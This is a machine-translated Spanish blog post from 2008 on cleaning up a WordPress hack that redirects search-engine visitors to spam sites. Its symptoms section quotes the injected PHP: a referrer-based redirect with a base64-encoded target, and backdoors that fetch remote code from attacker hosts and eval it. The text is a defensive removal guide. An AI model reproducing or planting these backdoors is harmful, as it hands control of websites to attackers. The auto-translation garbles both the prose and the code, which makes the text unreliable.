Corte de WordPress: Recupere y fije Google y Search Engine o ningún tráfico de la galleta vueltos a dirigir a Your-Needs.info, a AnyResults.Net, a Golden-Info.net y a otros sitios ilegales

Los piratas informáticos están saliendo todos a cortar y explotar los blogs de WordPress recibidos por todas partes la tela, plantando e inyectando código malévolo en los códigos y la base de datos de WordPress para volver a dirigir visitantes y golpes de Google y de otro los motores de la búsqueda para spam sitios tales como your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us y muchos otros sitios del Spam de los cuales llenó pagar-por-chascan anuncios del CPC. Algún corte aparece apuntar a una muchedumbre más grande volviendo a dirigir toda sin la galleta de WordPress. Sin cortado, éstos trafican supuesto para llegar el blog como destinación.

Síntomas del corte del cambio de dirección del Search Engine

Observe que no todos los síntomas pueden suceder en conjunto. Puede haber más de existió un método de cortes, que contribuyeron a diverso encontrar y a la resolución posible.

• Cualquier tecleo a través de los motores de la búsqueda tales como Google, Yahoo, AOL, MSN, resultados vivos de la búsqueda de Windows, incluyendo nombre del blog, será vuelto a dirigir y remitido a los sitios del pirata informático tales como your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, con la lista segura de crecer. El espectador llega la página del pirata informático con la misma secuencia de búsqueda que él o ella buscaba en Search Engine.
• Chasque encendido un acoplamiento al blog en lector de la alimentación de RSS tal como lector de Google puede ser vuelto a dirigir al sitio del pirata informático también.
• Volverán a dirigir a un visitante sin cuenta en el blog, o no la conexión (por lo tanto no hace hace la galleta detectar por código malévolo), para spam sitios.
• Solamente las visitas del Search Engine se vuelven a dirigir lejos, y el truco maneja engañar alrededor probablemente muchos bloggers, webmasters y dueños del sitio, o por lo menos retrasa la detección del problema.
• La gota enorme y dramática repentina y pierde de la cantidad masiva de visitantes trafica y pagina opiniónes en las estadísticas del perseguidor de la tela, especialmente tráfico con Google como referrer, aunque la clasificación de los resultados del Search Engine está intacta.
• Gota de Massic del ingresos por publicidad de Google el AdSense o la otra red de los anuncios, o comisiones del afiliado.
• El código codificado base64 siguiente del PHP puede aparecer en el archivo de wp-blog-header.php:

  ¿<? PHP \
$seref=array (“google”, “msn”, “vivo”, “AltaVista”, “pide”, “yahoo”, “AOL”, “CNN”, “tiempo”, “alexa”);
$ser=0; ¡foreach ($seref como $ref) si (strpos (strtolower ($_SERVER ['HTTP_REFERER']), $ref)! ¿==false) {$ser=” 1? ; rotura; }
¿si ($ser==” 1? sizeof del && ($_COOKIE) ==0) {jefe (” localización: http://” .base64_decode (” YW55cmVzdWx0cy5uZXQ="). ”/"); salida; ¿}? >

• Una imagen, que es de hecho un manojo de código malévolo del PHP, fue agregada al wp-contenido/al directorio de las cargas por teletratamiento. Por ejemplo, el wp-contenido/uploads/2008/06/06/abcdefghijklmn.jpg, o ella puede estar dentro de su carpeta del tema, es decir wp-contenido/temas/obra clásica/imágenes/xyz.jpg. El nombre de la imagen puede estar en el formato de xxxxxx_old.jpeg.
• Una entrada fue insertada en la base de datos de MySQL para que los wp_options de WordPress activen la imagen (el código malévolo del PHP) como enchufable, típicamente como rss_f541b3abd05e7962fcab37737f40fad8.
• Puede haber también códigos malévolos, especialmente los que interpretaron con comando eval () o de base64_decode () insertado en otros archivos del PHP de WordPress. Los ejemplos son los códigos siguientes:

  si (isset ($_GET [“p”])) {
$sock = @fsockopen ('km20725.keymachine.de', 80);
si ($sock) {
fwrite ($sock, `CONSIGUEN http://km20725.keymachine.de/server/index.php?host= '. $_SERVER [“SERVER_NAME”]. '&p='.$_GET [“p”]. '′ HTTP/1.0. ” \ r \ n ");
fwrite ($sock, anfitrión del `: ” \ r \ n \ r \ n de km20725.keymachine.de'. ");
mientras que ($content [] = fgets ($sock));
$content = implode (”, $content);
@eval (ajuste (substr ($content, strpos ($content, “\ r \ n \ r \ n "))));
fclose ($sock);}
}

  si (isset ($_GET [“p”])) {@eval (@file_get_contents ('http://beliy.us/server/index.php?host= '. $_SERVER [“SERVER_NAME”]. '&p='.$_GET [“p”]));
}

  si (isset ($_GET [“p”])) {@eval (@file_get_contents ('http://seogoogle.us/server/index.php?host= '. $_SERVER [“SERVER_NAME”]. '&p='.$_GET [“p”]));
}

  eval (gzinflate (base64_decode (

• El tema de WordPress se activa y se utiliza que se puede inyectar con cortar código y afectar también. Tal código existe normalmente en header.php o index.php del tema, y tiene una línea similar al abajo

  si ($ser==” 1 sizeof del && del ″ ($_COOKIE) ==0) {jefe (” localización:

El tráfico de la búsqueda de WordPress vuelve a dirigir para spam el corte del sitio sucede probablemente debido al agujero de seguridad y a la vulnerabilidad que no se remienda cuando el dueño del blog decide no aumentar a la última versión de WordPress (aunque algunos informes que sus blogs cortado aunque está ya en la última versión de WordPress 2.5.1). Lo que la causa, aquí es el arreglo y la solución para resolver y para derrotar el corte para asegurarse de que usted posee detrás el tráfico y evite penalizado por Google por la reorientación desrazonable para spam las páginas.

1. Respaldo la base de datos de WordPress.
2. Utilice el phpMyAdmin para hojear las tablas de base de datos de WordPress MySQL. Van a la tabla de los wp_options, y después corrigen la fila nombrada los active_plugins. La fila detalla todos los enchufes activos se ha activado que. Pasan a través de la lista (en una línea), y buscan un enchufable nombrado terminado con una extensión de la imagen, tal como .jpg, .jpeg, .gif y etc. por ejemplo, abcdefgh_old.jpeg. Observe abajo de la trayectoria al archivo de imagen.
3. Usando sFTP o SSH (olvide el ftp o el telnet para la seguridad), después navegue a la trayectoria del archivo, y suprima el archivo.
4. Vaya al panel de los enchufes del administrador de WordPress, desactive o active enchufable para despejar del enchufable malévolo de la fila de los “active_plugins”.
5. De nuevo a phpMyAdmin, en la tabla de los wp_options, encuentre una fila que contenga la secuencia siguiente como option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Suprima la fila ausente.

   Si usted no sabe realizarse la limpieza de la base de datos detallada en pasos arriba, aquí es una clase particular video:

6. Vaya a la tabla de los wp_users. Si hay un usuario sin nombre (valor nulo en campo del user_nicename) creado en el 00:00: 00 en 0000-00-00, nota abajo de la identificación del usuario (campo de la identificación, un número). Suprima al usuario.
7. Hojee la tabla del wp_usermeta. Localice todas las filas con los fósforos del user_id la identificación del usuario ilegal suprimido. Hay normalmente tres filas asociado a la identificación del usuario del invasor. Suprima todas las filas asociadas.
8. Ábrase una sesión al servidor para corregir los archivos del tema, u hojee el código de los archivos del tema en el redactor del tema del panel del diseño del administrador de WordPress. Compruebe el header.php y el index.php para saber si hay cualquier código sospechoso. Según lo mencionado anteriormente, busque algo similar a la línea abajo:

   si ($ser==” 1 sizeof del && del ″ ($_COOKIE) ==0) {jefe (” localización:

   Si está encontrado, suprima y quite el código. Observe que el código malévolo será varias líneas de largo en total.

9. Si no se existe ya, cree un archivo vacío de index.html en el wp-contenido/el directorio de los enchufes. index.html en blanco oculta el contenido del directorio de los enchufes, blinda con eficacia qué enchufes utilizado de piratas informáticos para endurecer y para apretar la seguridad de WordPress.
10. Cargue y substituya los archivos de cada WordPress (no sólo wp-blog-header.php) en el servidor por versión fresca, limpia, y de la original la última de WordPress (por supuesto, excepto pocos archivos tales como wp-config.php y temas). Si usted está aumentando, lea la guía cuidadosamente.
11. Cambie su contraseña.
12. Si usted tiene usuarios múltiples, cambie el suyo contraseña (o pídalo para cambiar la contraseña) también.

IMPORTANTE: La página es traducida por computador y con tal que “como está” sin garantía. La traducción automática puede ser difícil de entender. Refiera por favor al artículo inglés original siempre que sea posible.

Artículos relacionados

• Integre y exhiba Google AdSense para la búsqueda y los resultados de encargo del Search Engine del tonel en el blog de WordPress paginan la plantilla
• Substituya la búsqueda del blog de Google por Technorati para los acoplamientos entrantes en el tablero de instrumentos de WordPress
• StatTraq - Wordpress enchufables para la estadística del sitio y el contador del tráfico
• Este sitio puede dañar su computadora en cada los sitios desinsecta en resultados de la búsqueda de Google
• Corte para buscar y para ver libremente el webcam vivo con la búsqueda de Google
• ¿Wikiasari - Digg o StumbleUpon del tonel de Google Search Engine de encargo, para Wikipedia?
• WordPress enchufable: Exhibición Google Analytics y estadísticas de los informes de FeedBurner del sitio Admin
• Sistema completo de la insignia Collection (1998 - 2007) del día de fiesta del Search Engine de Google
• Cómo reajustar la contraseña de WordPress para recuperar secreto olvidado

Esta entrada fue fijada el martes 10 de junio de 2008 en el 1:03 y se archiva debajo de Weblogs. Usted puede seguir cualquier respuesta a esta entrada a través de la alimentación de RSS 2.0. Usted puede dejar una respuesta, o el trackback de su propio sitio.